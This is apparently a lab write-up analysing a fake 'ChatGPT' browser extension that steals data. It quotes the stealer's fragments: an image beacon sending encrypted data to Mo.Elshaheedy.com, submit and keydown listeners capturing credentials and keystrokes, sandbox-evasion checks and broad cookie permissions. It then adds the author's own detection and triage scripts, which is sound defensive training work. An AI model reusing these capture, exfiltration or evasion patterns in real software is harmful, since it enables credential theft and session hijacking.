FakeGPT Lab


Scenario

Your cybersecurity team has been alerted to suspicious activity on your organization’s network. Several employees reported unusual behavior in their browsers after installing what they believed to be a helpful browser extension named “ChatGPT”. However, strange things started happening: accounts were being compromised, and sensitive information appeared to be leaking.

Question 1

Which encoding method does the browser extension use to obscure target URLs, making them more difficult to detect during analysis?

Answer 1

One practical note first: most CRX viewers expect a plain .zip, so if the lab archive is password-protected you need to extract it and repack the extension files into a .zip without a password before a viewer will open them.

I skipped the viewers altogether and just opened the files in Sublime Text and read the source from there.

encrypt: function(data) {
    // Hard-coded 17-byte key, taken straight from the extension's source
    const key = CryptoJS.enc.Utf8.parse('SuperSecretKey123');
    // Fresh random IV on every call; note it is never returned with the ciphertext
    const iv = CryptoJS.lib.WordArray.random(16);
    const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv });
    // The ciphertext goes out as Base64 text
    return encrypted.toString(CryptoJS.enc.Base64);
}

It is clear from this function, which appears in both crypto.js and app.js, that the output is Base64. The same encoding is what hides the target URLs: the target list (see Answer 2) stores its hostnames as Base64 strings that are only decoded at runtime, which is enough to defeat a naive grep for the domain name but nothing more.

Question 2

Which website does the extension monitor for data theft, targeting user accounts to steal sensitive information?

Answer 2

Looking at the targets array, you can see a Base64 string being passed through the _0xabc1 decoder. Decoding d3d3LmZhY2Vib29rLmNvbQ== gives www.facebook.com, so the extension is watching for Facebook.

const targets = [_0xabc1('d3d3LmZhY2Vib29rLmNvbQ==')];
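To see how thin this obfuscation is, here is an added example (my own code, not part of the lab's extension) that does what the _0xabc1 helper must do: decode Base64 literals found in a script, keep the ones that turn into readable text, and check whether a hostname falls under a decoded target. The decodeTarget, decodeBase64Literals and isTargeted names are mine, and the sample source snippet is constructed from the two lines quoted on this page.

```javascript
// Added example for the FakeGPT write-up; not code from the extension.
// Runs under Node.js (Buffer is a global), no dependencies.

// Base64 -> UTF-8 text, the job the extension's _0xabc1 helper performs.
function decodeTarget(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

// Quoted literals of 8+ Base64 characters with optional padding. The
// minimum length keeps short identifiers that happen to be valid Base64 out.
const B64_LITERAL = /['"]([A-Za-z0-9+/]{8,}={0,2})['"]/g;

// Find every Base64-looking literal in a script and decode it, keeping only
// results that are printable ASCII (hostnames, paths, function names).
function decodeBase64Literals(source) {
  const found = [];
  for (const match of source.matchAll(B64_LITERAL)) {
    const raw = match[1];
    if (raw.length % 4 !== 0) continue;   // valid Base64 is padded to a multiple of 4
    const text = decodeTarget(raw);
    if (/^[\x20-\x7e]+$/.test(text)) found.push({ raw, text });
  }
  return found;
}

// Does a hostname match a decoded target? Exact host or a subdomain of it,
// so "www.facebook.com.evil.example" is not counted as Facebook.
function isTargeted(hostname, targets) {
  const host = hostname.toLowerCase();
  return targets.some(t => host === t || host.endsWith('.' + t));
}

// Constructed sample: the target line quoted in this write-up plus the key
// line from the encrypt function, which is not Base64 and must not decode.
const SAMPLE_SOURCE = `
const targets = [_0xabc1('d3d3LmZhY2Vib29rLmNvbQ==')];
const key = CryptoJS.enc.Utf8.parse('SuperSecretKey123');
`;

const DECODED = decodeBase64Literals(SAMPLE_SOURCE);
const TARGET_HOSTS = DECODED.map(d => d.text);
console.log(DECODED);                                                   // [{ raw: 'd3d3LmZhY2Vib29rLmNvbQ==', text: 'www.facebook.com' }]
console.log(isTargeted('www.facebook.com', TARGET_HOSTS));              // true
console.log(isTargeted('www.facebook.com.evil.example', TARGET_HOSTS)); // false
```

The length check matters in practice: SuperSecretKey123 is a valid Base64 alphabet string, and without the multiple-of-four test it would be "decoded" into garbage and clutter the output.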

Question 3

Which type of HTML element is utilized by the extension to send stolen data?

Answer 3

The sendToServer function holds the answer.

function sendToServer(encryptedData) {
    var img = new Image();
    // Assigning src fires a GET request; the stolen data rides along in the query string
    img.src = 'https://Mo.Elshaheedy.com/collect?data=' + encodeURIComponent(encryptedData);
    document.body.appendChild(img);
}

It uses an img element. This is a classic image beacon: assigning src makes the browser issue an ordinary GET, so the exfiltration needs no fetch or XMLHttpRequest call, is not stopped by CORS, and blends in with the page's normal image loads in any network log.

Question 4

What is the first specific condition in the code that triggers the extension to deactivate itself?

Answer 4

The extension checks for a virtual or automated environment as soon as the browser loads it, to evade sandboxes and real-time analysis.

    // Check if the browser is in a virtual environment
    if (navigator.plugins.length === 0 || /HeadlessChrome/.test(navigator.userAgent)) {
        alert("Virtual environment detected. Extension will disable itself.");
        chrome.runtime.onMessage.addListener(() => { return false; });
    }

The first condition is navigator.plugins.length === 0: it tests whether the browser reports no plugins at all, which is typical of headless and automated browsers rather than a user's desktop Chrome. The second tests whether the user agent contains HeadlessChrome, i.e. Chrome running without a UI, which analysis sandboxes and crawlers commonly use. As far as this snippet shows, the "deactivation" is cosmetic: it pops an alert and registers a no-op message listener, but removes none of the hooks the extension installs.

Question 5

Which event does the extension capture to track user input submitted through forms?

Answer 5

Near the top of the code, a listener for the submit event catches every form submission on any page the user visits. It then extracts the username/email and password fields and hands them to the other functions to be exfiltrated.

document.addEventListener('submit', function(event) {
    // ... reads the username/email and password fields and passes them on
});

Question 6

Which API or method does the extension use to capture and monitor user keystrokes?

Answer 6

Just below that listener there is the following:

document.addEventListener('keydown', function(event) {
    var key = event.key;
    exfiltrateData('keystroke', key);
});

It uses the keydown event, registered through document.addEventListener, to capture keystrokes. keydown fires for every key, including modifiers and Backspace, so what gets exfiltrated is every key the user presses on every page, not just what ends up in a form field.

Question 7

What is the domain where the extension transmits the exfiltrated data?

Answer 7

Within the sendToServer function, right after the Image object is created, the URL the data is sent to is assigned to its src:

img.src = 'https://Mo.Elshaheedy.com/collect?data=' + encodeURIComponent(encryptedData);

The exfiltration domain is Mo.Elshaheedy.com.
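On the defensive side, a beacon like this is just one more GET in the proxy log, so here is an added example (my own detection logic, not from the lab) that sweeps constructed proxy log lines for the pattern the extension leaves behind: a GET carrying one long, high-entropy query value. The log format, the thresholds (40 characters, 4.5 bits per character) and the function names are assumptions made for the demo.

```javascript
// Added example for the FakeGPT write-up; not code from the lab or the
// extension. Node.js, no dependencies (URL is a global).

// Shannon entropy in bits per character. Base64 ciphertext sits close to
// 6; words, ids and campaign names sit well below 4.5.
function entropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) {
    const p = c / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Constructed log format: "<timestamp> <client> <method> <url> <status> <bytes>".
// URL lowercases the hostname, so Mo.Elshaheedy.com is reported as mo.elshaheedy.com.
function parseLogLine(line) {
  const [ts, client, method, url, status, bytes] = line.trim().split(/\s+/);
  return { ts, client, method, url: new URL(url), status: Number(status), bytes: Number(bytes) };
}

// Return the first query parameter that looks like an opaque blob, or null.
// The thresholds are demo assumptions; tune them on your own traffic.
function beaconParam(req, { minLen = 40, minEntropy = 4.5 } = {}) {
  if (req.method !== 'GET') return null;
  for (const [name, value] of req.url.searchParams) {
    if (value.length >= minLen && entropy(value) >= minEntropy) return { name, value };
  }
  return null;
}

// Sweep log lines and report suspected beacons with the fields an analyst
// needs to pivot on: who sent it, where it went, how big the payload was.
function findBeacons(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    const p = beaconParam(req);
    if (!p) continue;
    hits.push({
      ts: req.ts,
      client: req.client,
      host: req.url.hostname,
      path: req.url.pathname,
      param: p.name,
      payloadLength: p.value.length,
      payloadEntropy: Number(entropy(p.value).toFixed(2)),
    });
  }
  return hits;
}

// Constructed sample lines. The second has the shape the extension's <img>
// beacon leaves behind; its payload is a made-up Base64 string, not real ciphertext.
// The last line is a long but low-entropy value that must not be flagged.
const SAMPLE_LOG = [
  '2024-05-01T10:00:01Z 10.0.0.12 GET https://www.facebook.com/login/ 200 5120',
  '2024-05-01T10:00:02Z 10.0.0.12 GET https://Mo.Elshaheedy.com/collect?data=kR7vQ2mXp9Lc4TaZ0nHbW6uE3yJsF1gD8iOoA5xVqNtCeKl%2BwMrYBG%2FUzIP%3D 200 43',
  '2024-05-01T10:00:03Z 10.0.0.12 GET https://www.example.com/search?q=chatgpt+extension 200 2048',
  '2024-05-01T10:00:04Z 10.0.0.12 GET https://shop.example.com/?utm_campaign=summer_sale_2024_newsletter_edition_for_all_customers 200 900',
];

console.log(findBeacons(SAMPLE_LOG)); // one hit: host mo.elshaheedy.com, path /collect, param data, payloadLength 60
```

Entropy alone is a coarse signal (tracking pixels and CDN signatures also carry random-looking tokens), so in a real hunt you would join these hits against the domain's age and reputation and against which client processes made the request, but it is enough to surface a beacon URL like this one out of ordinary browsing.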

Question 8

Which function in the code is used to exfiltrate user credentials, including the username and password?

Answer 8

A pretty obvious one here: the functions are aptly named.

exfiltrateCredentials(username, password);

Question 9

Which encryption algorithm is applied to secure the data before sending?

Answer 9

The answer is in the encryption routine shown under Answer 1. It uses AES through CryptoJS, which defaults to CBC mode with PKCS#7 padding when a raw key is supplied, with a key hard-coded in the source.

const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv });

Question 10

What does the extension access to store or manipulate session-related data and authentication information?

Answer 10

Session-related data means cookies, which the extension is allowed to read and write thanks to the cookies permission in manifest.json. Combined with the http://*/* and https://*/* host permissions, that covers cookies for every site the user visits, so stolen session cookies let an attacker hijack logged-in sessions without needing the password at all.

  "permissions": [
    "tabs",
    "http://*/*",
    "https://*/*",
    "storage",
    "webRequest",
    "webRequestBlocking",
    "cookies"
  ],
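Putting the manifest and the listeners together, here is an added example (my own triage script, not code from the lab) that does the first pass an analyst would do on an unpacked extension: flag broad host patterns and sensitive permissions in manifest.json, then look in the content script for input-capture listeners (the submit and keydown hooks from Answers 5 and 6) sitting next to a network sink such as new Image() or a .src assignment. The function names are mine; the sample manifest is built from the permission list above and the sample script from the fragments quoted on this page.

```javascript
// Added example for the FakeGPT write-up; not code from the lab or the
// extension. Node.js, no dependencies.

// Permissions that let an extension read or alter other sites' data.
const SENSITIVE_PERMISSIONS = new Set([
  'cookies', 'webRequest', 'webRequestBlocking', 'tabs', 'history',
  'nativeMessaging', 'debugger', 'clipboardRead',
]);
// Host patterns that cover every site: "*://*/*", "http://*/*", "https://*/*"
// ("<all_urls>" is handled separately below).
const BROAD_HOST = /^(\*|https?):\/\/\*\//;

function reviewPermissions(manifest) {
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  return {
    broadHosts: perms.filter(p => p === '<all_urls>' || BROAD_HOST.test(p)),
    sensitive: perms.filter(p => SENSITIVE_PERMISSIONS.has(p)),
  };
}

// Input-capture listeners, and the ways captured data can leave the page.
const INPUT_LISTENERS = /addEventListener\(\s*['"](submit|keydown|keypress|keyup|input|paste)['"]/g;
const NETWORK_SINKS = /new\s+Image\s*\(|\.src\s*=|\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon/g;

function reviewContentScript(source) {
  const listeners = [...new Set([...source.matchAll(INPUT_LISTENERS)].map(m => m[1]))];
  const sinks = [...new Set([...source.matchAll(NETWORK_SINKS)].map(m => m[0].replace(/\s+/g, ' ')))];
  // Capture without a sink is a UX feature; capture plus a sink is a stealer shape.
  return { listeners, sinks, captureAndSend: listeners.length > 0 && sinks.length > 0 };
}

// Combine both reviews into analyst-readable findings.
function triage(manifest, source) {
  const findings = [];
  const { broadHosts, sensitive } = reviewPermissions(manifest);
  if (broadHosts.length) findings.push(`runs on every site: ${broadHosts.join(', ')}`);
  if (sensitive.includes('cookies') && broadHosts.length) findings.push('can read session cookies for every site (cookies + broad hosts)');
  if (sensitive.includes('webRequestBlocking')) findings.push('can intercept and modify traffic (webRequestBlocking)');
  const cs = reviewContentScript(source);
  if (cs.captureAndSend) findings.push(`captures ${cs.listeners.join('/')} events in a file that also has network sinks: ${cs.sinks.join(', ')}`);
  return findings;
}

// Constructed from the permission list quoted above.
const SAMPLE_MANIFEST = {
  name: 'ChatGPT',
  permissions: ['tabs', 'http://*/*', 'https://*/*', 'storage', 'webRequest', 'webRequestBlocking', 'cookies'],
};

// Constructed from the fragments quoted in Answers 3, 5 and 6.
const SAMPLE_CONTENT_SCRIPT = `
document.addEventListener('submit', function (event) { /* credential fields read here */ });
document.addEventListener('keydown', function (event) { exfiltrateData('keystroke', event.key); });
function sendToServer(encryptedData) {
  var img = new Image();
  img.src = 'https://Mo.Elshaheedy.com/collect?data=' + encodeURIComponent(encryptedData);
  document.body.appendChild(img);
}
`;

console.log(triage(SAMPLE_MANIFEST, SAMPLE_CONTENT_SCRIPT)); // four findings for this sample
```

None of these findings proves malice on its own (a password manager legitimately needs broad hosts and submit listeners), but an extension that claims to be a ChatGPT helper and asks for cookies, webRequestBlocking and every host should not get past this check without someone reading the code.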

A rather easy yet fun lab. Information stealers are interesting, especially given how common they have become. This newer, in-browser kind of threat, which here goes after credentials and session data and in other variants after cryptocurrency, is rather dangerous.
